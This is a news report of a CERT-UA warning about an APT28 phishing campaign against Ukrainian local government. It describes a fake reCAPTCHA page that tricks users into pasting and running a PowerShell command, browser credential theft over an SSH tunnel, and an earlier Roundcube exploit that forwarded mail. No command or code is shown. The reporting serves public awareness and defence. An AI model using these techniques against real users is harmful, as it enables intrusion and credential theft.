The Government Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign targeting local government entities.
The campaign, attributed to the Russian military hacking unit APT 28 aka Fancy Bear and UAC-0001, is utilizing emails with the subject line "Table Replacement" and links resembling a Google Sheets document. Upon clicking the link, users are redirected to a page mimicking a reCAPTCHA verification, attempting to trick them into executing a malicious PowerShell command.
The malicious page prompts users to click a checkbox labeled "I'm not a robot." Once clicked, a PowerShell command is copied to the user’s clipboard. The accompanying instructions urge recipients to open the Windows Run dialog with the "Win+R" keyboard shortcut, paste the command with "Ctrl+V," and press "Enter." This action would execute the PowerShell command, leading to the download and launch of a malicious HTA file named "browser.hta" and a PowerShell script "Browser.ps1."
CERT-UA warns that the primary purpose of the attack is establishing an SSH tunnel for exfiltrating data such as authentication and other sensitive information from browsers like Chrome, Edge, Opera, and Firefox. The attackers then deploy the Metasploit framework for further exploitation and system control.
The incident follows a September 2024 phishing attack in which a threat actor exploited a vulnerability in the Roundcube email client (CVE-2023-43770) to harvest authentication credentials and create a filter named "SystemHealthCheck" using the "ManageSiev" plugin. This filter redirected emails from the compromised accounts to an attacker-controlled inbox.
Both phishing attacks have been linked to a compromised command-and-control (C2) server, which was identified during investigations. CERT-UA discovered that this server facilitated access to over ten compromised government email accounts. Attackers used these accounts to automate data exfiltration and distribute phishing emails, including those containing exploits, targeting defense organizations globally.